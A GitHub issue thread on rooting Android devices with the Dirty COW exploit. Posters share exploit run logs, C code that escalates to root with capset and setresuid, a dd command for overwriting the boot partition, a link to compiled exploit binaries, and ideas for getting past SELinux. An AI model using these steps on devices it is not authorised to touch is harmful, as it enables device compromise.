Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

How do you spawn a shell after exploit? #9

Closed
naikel opened this issue Oct 24, 2016 · 1,099 comments
Closed

How do you spawn a shell after exploit? #9

naikel opened this issue Oct 24, 2016 · 1,099 comments

Comments

@naikel
Copy link

naikel commented Oct 24, 2016

I've tried execpl, system, even executing chmod(const char *pathname, mode_t mode) in the code but nothing seems to work.

I do get getuid() == 0, but I can't do anything with that privilege.

EDIT: My device does NOT have /system/bin/run-as with setuid and I have seen NO device that has it set.

@joel0
Copy link

joel0 commented Oct 25, 2016

The setuid bit was changed in Android 4.3(?) to Linux capabilities. run-as has the Linux capability to set the UID to 0 (root), but in my experimenting, it seems to lack other useful capabilities, such as writing files.

I would start by looking at the AOSP implementation of run-as and finding how it executes the packages and remove some safety checks.

@rhcp011235
Copy link

You need to disable SELinux first

@naikel
Copy link
Author

naikel commented Oct 25, 2016

10-24 23:40:22.933 10954 10954 W run-as : type=1400 audit(0.0:728): avc: denied { setenforce } for uid=0 scontext=u:r:runas:s0 tcontext=u:object_r:kernel:s0 tclass=security permissive=0

Not that trivial, to me at least.

@rhcp011235
Copy link

what do you mean? You didn't spawn a shell did you?

check the binary - -rwxr-xr-x 1 root shell 18K 2009-01-01 03:00 app_process64

@naikel
Copy link
Author

naikel commented Oct 25, 2016

I can't spawn a shell from the run-as context.

I have app_process32 (same thing). It has the zygote context. The one I pasted before was using the runas context. From that context I can't disable SELinux either:

10-24 23:44:58.603 11542 11542 W app_process: type=1400 audit(0.0:738): avc: denied { setenforce } for uid=0 scontext=u:r:zygote:s0 tcontext=u:object_r:kernel:s0 tclass=security permissive=0

@lucasa831
Copy link

what if we just use the exploit to replace install-recovery.sh with a script that paste su into it's folder then overwrites itself to the original superuser install recovery file then it'll load itself

@naikel
Copy link
Author

naikel commented Oct 25, 2016

You can't. Remember the whole /system is reconstructed before boot. If you reboot you'll lose all your changes.

@lucasa831
Copy link

what about using it to replace something like the reboot binary (that may be ran as root) with a binary that mount system as rw then paste everything needed by superuser

@naikel
Copy link
Author

naikel commented Oct 25, 2016

The problem is the SELinux context. The best choice is replacing app_process32. You can get root, that's no problem. That's easy.

But then you have a root that can't do anything. When you try to write a file it says denied, because you can only write files that the SELinux context allows you to. That is, for example, the dalvik cache. You can create a file there. Let's say you copy the su there. You run it: SAME PROBLEM. Now you have a shell, with the same SELinux context.

What you want is:

  • To remount /system as rw
  • To write su to /system/xbin/su, that way su will run on the SELinux context "su_exec".

So what else you can do? disable SELinux, so you can do all this. But if you could disable SELinux in a SELinux context, SELinux wouldn't exist in the first place....

I think I lost hope with dirty cow and Android >= 5.

@rhcp011235
Copy link

Jcase has rooted the latest HTC 10 running latest android using this. so i assume there is a way :)

@rhcp011235
Copy link

You can disable selinux in selinux. The init context can enable (or disable) it.
So wherever init is. Over write it

@Manouchehri
Copy link
Contributor

PS C:\Users\david> adb shell
shell@flo:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0
shell@flo:/ $ run-as id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:runas:s0
shell@flo:/ $ ls -lZ /sbin/
opendir failed, Permission denied
1|shell@flo:/ $ run-as ls -lZ /sbin/
-rwxr-x--- root     root              u:object_r:rootfs:s0 adbd
-rwxr-x--- root     root              u:object_r:rootfs:s0 healthd
lrwxrwxrwx root     root              u:object_r:rootfs:s0 ueventd -> ../init
lrwxrwxrwx root     root              u:object_r:rootfs:s0 watchdogd -> ../init
shell@flo:/ $ cat /init.flo.diag.rc
/system/bin/sh: cat: /init.flo.diag.rc: Permission denied
1|shell@flo:/ $ run-as cat /init.flo.diag.rc
# This file gets copied as /init.flo.diag.rc

on post-fs-data
    rm /dev/diag

@naikel
Copy link
Author

naikel commented Oct 25, 2016

The problem is this:

shell@flo:/ $ run-as id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:runas:s0

That's a useless context. Can you execute something in, say, /data/local/tmp as root using that context?

Or better yet, can you remount /system as rw?

Because I couldn't. I can read files like you, but I can write/execute anything.

Using the app_process32 (zygote) context I can do a little more, but at the end of the day they are still useless things.

EDIT: Show me your selinux_android_setcontext() in your run-as.c ;)

@Manouchehri
Copy link
Contributor

Pick a different target so the context isn't an issue anymore.

The answer is here. https://source.android.com/security/selinux/implement.html

@GeneBlue
Copy link

So, how to bypass selinux? Could you give some hint? @Manouchehri

@ghost
Copy link

ghost commented Oct 25, 2016

can you post the source code of the run-as you are using to get root access?

@naikel
Copy link
Author

naikel commented Oct 25, 2016

In my device these are the only targets I can pick:

shell@victara:/system/bin $ ( ls -lZ 2>/dev/null ) | grep -v system_file
-rwxr-xr-x root     shell             u:object_r:zygote_exec:s0 app_process32
-rwxr-xr-x root     shell             u:object_r:dex2oat_exec:s0 dex2oat
-rwxr-xr-x root     shell             u:object_r:logcat_exec:s0 logcat
-rwxr-xr-x root     shell             u:object_r:motobox_exec:s0 motobox
-rwxr-xr-x root     shell             u:object_r:dex2oat_exec:s0 patchoat
-rwxr-x--- root     shell             u:object_r:runas_exec:s0 run-as
-rwxr-xr-x root     shell             u:object_r:shell_exec:s0 sh
-rwxr-xr-x root     shell             u:object_r:toolbox_exec:s0 toolbox
-rwxr-xr-x root     shell             u:object_r:toolbox_exec:s0 toybox

The best context is zygote_exec, but still not very useful.

@Manouchehri
Copy link
Contributor

Manouchehri commented Oct 25, 2016

You have access to way more files than just /system/bin/.

run-as is just spawning toybox there, still limited by SELinux.

@rhcp011235
Copy link

We will need to kill SELinux though to get a real shell

@naikel
Copy link
Author

naikel commented Oct 26, 2016

What about rewriting the SELinux files like /file_contexts and somehow running "restorecon"... that would "kill" it.

The zygote process (app_process32) has a lot of privileges. Somebody could get an idea by just reading the zygote.te file (you can Google that if you don't want to download the whole Android source).

Interesting things are:

# Override DAC on files and switch uid/gid.
allow zygote self:capability { dac_override setgid setuid fowner };

# Switch SELinux context to app domains.
allow zygote system:process dyntransition;

allow zygote dalvikcache_data_file:file { create_file_perms x_file_perms };

# Read /seapp_contexts and /data/security/seapp_contexts
security_access_policy(zygote)

And many many other things.

@SquallATF
Copy link

can we replace kernel module and find a way to trigger insmod to bypass selinux?
my device have follow kernel module

shell@F8132:/ $ ls /system/lib/modules/
ansi_cprng.ko
backlight.ko
bcmdhd.ko
br_netfilter.ko
core_ctl.ko
ecryptfs.ko
generic_bl.ko
kscl.ko
lcd.ko
mmc_block_test.ko
mmc_test.ko
msm-buspm-dev.ko
rdbg.ko
spidev.ko
test-iosched.ko
texfat.ko
ufs_test.ko
wil6210.ko

only follow module inserted

shell@F8132:/ $ lsmod  
Module                  Size  Used by
texfat                157455  0
wlan                  871035  0
kscl                   15531  0
ecryptfs               84851  0

@alien0x00
Copy link

@naikel I have an issue when I try to use app_process32 as target. I'm able to apply the "patch" but then, when I try to execute /system/bin/app_process32 I'm not able to become root:

>>> /system/bin/app_process32
Running as uid 2000
Could not set capabilities: Operation not permitted
setresgid/setresuid failed

This is weird! The zygote.pe file contains:
allow zygote self:capability { dac_override setgid setuid fowner chown };
Could you help me?

@naikel
Copy link
Author

naikel commented Oct 26, 2016

Remember to always use logcat | grep audit to know exaclty what is going on.

Same thing happens to me with app_process32, but then I can see in the logs that some other root process executes it... and then the phone GUI dies but the shell through adb shell still works.

But I have other problems since zygote can't execute anything on /system/bin:

10-26 10:58:17.712 30113 30113 W app_process: type=1400 audit(0.0:8400): avc: denied { read } for uid=0 path="/system/bin/sh" dev="mmcblk0p38" ino=371 scontext=u:r:zygote:s0 tcontext=u:object_r:shell_exec:s0 tclass=file permissive=0

@alien0x00
Copy link

On the logcat, as soon as I "patch" app_process32, I can actually see several processes crashing (as normal to be)

I suppose we need to use another process as target, but... which one?

@umntkid
Copy link

umntkid commented Oct 26, 2016

I'm getting permission denied on everything on Nexus 4 Android 5.0

char *envp[] = { NULL };
  char *argvv[] = { "-l", "/data/local/tmp/", NULL };
  execve("/system/bin/ls", argvv, envp);
  printf("Something went wrong! %s\n", strerror(errno));
adb shell /system/bin/run-as
running as uid 2000
uid 0
euid 0
Something went wrong! Permission denied

@naikel
Copy link
Author

naikel commented Oct 26, 2016

@umntkid you should read the thread first before posting... We already stated u:r:runas:s0 context has no execute permission. You can't do anything in that context.

@rhcp011235
Copy link

Not 100% true.

@naikel @umntkid this works just fine:

#include <unistd.h>
#include <stdio.h>
#include <sys/capability.h>
#include <dirent.h>

int main(int argc, char **argv)
{
DIR *dir;
struct __user_cap_header_struct capheader;
struct __user_cap_data_struct capdata[2];
struct dirent *ent;

printf("running as uid %d\n", getuid());

memset(&capheader, 0, sizeof(capheader));
memset(&capdata, 0, sizeof(capdata));
capheader.version = _LINUX_CAPABILITY_VERSION_3;
capdata[CAP_TO_INDEX(CAP_SETUID)].effective |= CAP_TO_MASK(CAP_SETUID);
capdata[CAP_TO_INDEX(CAP_SETGID)].effective |= CAP_TO_MASK(CAP_SETGID);
capdata[CAP_TO_INDEX(CAP_SETUID)].permitted |= CAP_TO_MASK(CAP_SETUID);
capdata[CAP_TO_INDEX(CAP_SETGID)].permitted |= CAP_TO_MASK(CAP_SETGID);
if (capset(&capheader, &capdata[0]) < 0) {
printf("Could not set capabilities: %s\n", strerror(errno));
}

if(setresgid(0,0,0) || setresuid(0,0,0)) {
printf("setresgid/setresuid failed\n");
}

if ((dir = opendir ("/sbin/")) != NULL) {
while ((ent = readdir (dir)) != NULL) {
printf ("%s\n", ent->d_name);
}
closedir (dir);
}
return 0;
}

@naikel
Copy link
Author

naikel commented Oct 26, 2016

Yes, you can read files in the runas context.

@Manouchehri
Copy link
Contributor

Manouchehri commented Oct 26, 2016 via email

@vinecodes
Copy link

@TonyStark
Copy link

@naikel @joel0
is there any way to get aboot.img from /dev/block??

@droidvoider
Copy link
Contributor

Look at farm-root it is designed to pull / push boot images. (actually in the code it pushes recovery only but you can just edit it to be boot. (use my copy I updated it with newer dirtycow)
https://github.com/droidvoider/N920A-farm-root
change the line in toolbox.c to look like this, guessing on the fly, double check stuff
const char *args[] = {"/system/bin/dd", "if=/cache/recovery/recovery_push.img", "of=/dev/block/bootdevice/by-name/boot", "bs=4096", 0};

I think it is imperative the file sizes are the same. Also there's a file recovery-from-boot.p which I think might need to be taken down also.

@TonyStark
Copy link

TonyStark commented Mar 13, 2017

@droidvoider Thanks but i think its not work, posting in issue on your repo (https://github.com/droidvoider/N920A-farm-root/issues/1)

@me2151
Copy link

me2151 commented Mar 13, 2017

@TonyStark what device do you have? My v20 root method has access to abbot and boot images on stock device

@TonyStark
Copy link

TonyStark commented Mar 13, 2017

@me2151 i have coolpad arm64-v8a mashmellow, how did you access?
i tried that run-as, dirtycow method but it give me permission denied everywhere.

@me2151
Copy link

me2151 commented Mar 13, 2017

@TonyStark daisychaining multiple dirtycow files together to get access to the atd file. Then dirtycowed a custom binary to atd that backup the aboot and boot images

@TonyStark
Copy link

@me2151 do you have working dirtycow source code? so i can compile and test....

@me2151
Copy link

me2151 commented Mar 13, 2017

@TonyStark I do not have my source code anymore but I do have the compiled files that are needed to run the exploit. https://www.androidfilehost.com/?fid=457095661767122821 delete any .IMG files in the zip so you don't accidentally install them

@me2151
Copy link

me2151 commented Mar 13, 2017

@TonyStark if you read the .bat files(right click then edit) you can see exactly which commands to do.

@TonyStark
Copy link

@me2151 okay downloading and checking, thanks

@me2151
Copy link

me2151 commented Mar 13, 2017

@TonyStark when going through everything after you finish everything in step 1 you need to type run-as con in your adb shell and it SHOULD give you a # that's only temporary then you need to chmod 0777 /storage/emulated/0/*
Then run applypatch /system/bin/atd /storage/emulated/0/dirtysanta

This was developed for android 7.0 so it may not work on 6.0. If its a tablet you are using it may not have the atd file. You do not need to run step 2 or 3. The aboot and boot imaged will automatically backup to the /storage/emulated/0 directory.

@me2151
Copy link

me2151 commented Mar 13, 2017

@TonyStark forgot to mention the apply patch command needs to be run from a terminal emulator on the device itself.

@me2151
Copy link

me2151 commented Mar 13, 2017

Good luck

@TonyStark
Copy link

@me2151 i successfully run step1.sh however applypatch /system/bin/atd /storage/emulated/0/dirtysanta giving error that could not open /system/bin/atd

@me2151
Copy link

me2151 commented Mar 13, 2017

@TonyStark can you go to the directory can confirm you actually have atd? Its caller I'd if I remember right so tablets may not have it

@me2151
Copy link

me2151 commented Mar 13, 2017

Also did you run it from the device and not your adb shell?

@TonyStark
Copy link

@me2151
Well its not tablet.
there is no atd file in system/bin
here is all the thing inside system/bin (http://pastebin.com/QUdKM2si)
Yes i ran from both, adb and device emulator. but same error.

@me2151
Copy link

me2151 commented Mar 13, 2017

@TonyStark well that sucks. You will have to go through your selinux contexts to see what has read access to aboot_block_file. Its probably because the device is marshmallow that is doesn't have the atd file.

@TonyStark
Copy link

@me2151 hmm. okay
using farm-root cant we pull aboot.img?

@sirmordred
Copy link

hello all
i made a simple app "DirtyCow Checker" and published on playstore https://play.google.com/store/apps/details?id=com.oguzhan.mordred.testdirty&hl=EN

You guys can use it to verify dirtycow is usable on device or not with this app

@sirmordred
Copy link

Google removed the app from playstore because of violating policy -they said-
For those who want to try app:
here is the thread on xda(you can find apk file on there): https://forum.xda-developers.com/android/software/dirtycow-checkerapp-2-3-t3585546

@walkman4321
Copy link

I am trying to root samsung galaxy o7 android version 6.0
follow the steps mention in README.md files
CVE-2016-5195-master$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-23
make[1]: Entering directory /home/rohitnew/CVE-2016-5195-master' [armeabi-v7a] Install : dirtycow => libs/armeabi-v7a/dirtycow [armeabi-v7a] Install : run-as => libs/armeabi-v7a/run-as make[1]: Leaving directory /home/rohitnew/CVE-2016-5195-master'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
[100%] /data/local/tmp/dcow
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
[100%] /data/local/tmp/run-as
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (5544) and destination file size (17916) differ

[] size 17916
[
] mmap 0xb6e15000
[] currently 0xb6e15000=464c457f
[
] using /proc/self/mem method
[] madvise = 0xb6e15000 17916
[
] madvise = 0 16777216
[] /proc/self/mem 1649005660 571497
[
] exploited 0 0xb6e15000=464c457f

CVE-2016-5195-master$ adb shell
shell@o7prolte:/ $ run-as id
run-as: Package 'id' is unknown

It gives me this error "Package 'id' is unknown". Please help me if I am doing something wrong

@timwr
Copy link
Owner

timwr commented Jun 15, 2017

Try make test, perhaps your device isn't vulnerable

@timwr timwr closed this as completed Jun 15, 2017
@walkman4321
Copy link

walkman4321 commented Jun 15, 2017

Thank you for reply me
Yes you are correct
$make test
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-23
make[1]: Entering directory /home/rohitnew/xlastfilder/CVE-2016-5195-master' [armeabi-v7a] Install : dirtycow => libs/armeabi-v7a/dirtycow [armeabi-v7a] Install : run-as => libs/armeabi-v7a/run-as make[1]: Leaving directory /home/rohitnew/xlastfilder/CVE-2016-5195-master'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
[100%] /data/local/tmp/dcow
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push test.sh /data/local/tmp/test.sh
[100%] /data/local/tmp/test.sh
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/test.sh'
adb shell '/data/local/tmp/test.sh'
-rw-rw-rw- shell shell 18 2017-06-15 16:17 test
-rwxrwxrwx shell shell 367 2017-02-27 09:59 test.sh
-r--r--r-- shell shell 18 2017-06-15 16:17 test2
adb shell '/data/local/tmp/dcow /data/local/tmp/test /data/local/tmp/test2'
dcow /data/local/tmp/test /data/local/tmp/test2
[] size 18
[
] mmap 0xb6e4e000
[] currently 0xb6e4e000=72756f79
[
] using /proc/self/mem method
[] madvise = 0xb6e4e000 18
[
] madvise = 0 16777216
[] /proc/self/mem 71637732 3979874
[
] exploited 0 0xb6e4e000=6e6c7576
adb shell 'cat /data/local/tmp/test2'
yournotvulnerable
adb shell 'cat /data/local/tmp/test2' | xxd
0000000: 796f 7572 6e6f 7476 756c 6e65 7261 626c yournotvulnerabl
0000010: 650d 0a e..
So my device can not be exploit.Is there any other way to exploit this device

@msftsecurityteam
Copy link

Hi guys, maybe this was answered above. I am gaining root in my process but SELinux does not allow me to drop to a shell as root. I have complete control over the selinux policy and can make any changes I want. What is/are the rule(s) that I need to add/remove for a Samsung KNOX 2.6 Android 6.0.1 to allow me to get a root shell?

@hemowahib
Copy link

@eeeeyal What is this tool?

https://cloud.githubusercontent.com/assets/10957376/22936751/1dafbe96-f2df-11e6-8f76-e1b8d2c4c714.png

i need this tools
give me please

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests